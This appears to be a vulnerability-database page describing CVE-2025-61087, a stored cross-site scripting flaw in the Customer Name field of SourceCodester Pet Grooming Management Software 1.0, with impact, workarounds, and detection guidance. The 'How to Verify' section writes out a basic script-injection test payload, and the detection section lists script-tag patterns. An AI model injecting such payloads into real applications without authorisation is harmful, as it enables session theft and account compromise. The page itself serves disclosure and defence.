Login Sign Up

CVE-2025-61087

6.1 MEDIUM
Cross-Site Scripting

📋 TL;DR

This CVE describes a stored cross-site scripting (XSS) vulnerability in SourceCodester Pet Grooming Management Software 1.0. Attackers can inject malicious scripts via the Customer Name field in the Customer Management section, which are then executed when other users view the affected pages. Organizations using this specific software version are affected.

💻 Affected Systems

Products:
  • SourceCodester Pet Grooming Management Software
Versions: 1.0
Operating Systems: Any OS running the web application
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the default installation and requires no special configuration to be exploitable.

📦 What is this software?

Pet Grooming Management Software by Mayurik

View all CVEs affecting Pet Grooming Management Software →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator or user session cookies, perform actions on behalf of authenticated users, deface the application, or redirect users to malicious sites.

🟠

Likely Case

Attackers inject malicious scripts to steal session cookies or credentials from users who view customer records, potentially leading to account compromise.

🟢

If Mitigated

With proper input validation and output encoding, malicious scripts are neutralized before execution, preventing exploitation.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires access to create or modify customer records, but the XSS payload execution affects all users viewing those records.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not available

Restart Required: No

Instructions:

No official patch available. Consider implementing input validation and output encoding as workarounds.

🔧 Temporary Workarounds

Implement Input Validation

all

Add server-side validation to sanitize or reject malicious input in the Customer Name field.

Implement Output Encoding

all

Encode user-controlled data before rendering it in HTML to prevent script execution.

🧯 If You Can't Patch

  • Restrict access to the Customer Management section to trusted users only.
  • Implement a web application firewall (WAF) with XSS protection rules.

🔍 How to Verify

Check if Vulnerable:

Test by entering a simple XSS payload like <script>alert('XSS')</script> in the Customer Name field and check if it executes when viewing the record.

Check Version:

Check the software version in the application's admin panel or configuration files.

Verify Fix Applied:

After implementing fixes, test with the same XSS payload to ensure it is properly sanitized or encoded and does not execute.

📡 Detection & Monitoring

Log Indicators:

  • Unusual characters or script tags in customer name fields in application logs.

Network Indicators:

  • HTTP requests containing script tags or JavaScript code in POST parameters to customer management endpoints.

SIEM Query:

Search for POST requests to customer management URLs containing patterns like <script> or javascript: in the request body.

📊 Metadata

CVE ID: CVE-2025-61087
CVSS v3 Score: 6.1 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
EPSS Score: 0.07% exploit probability (20.8th percentile)
Published: October 2, 2025
Last Updated: October 7, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-61087, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)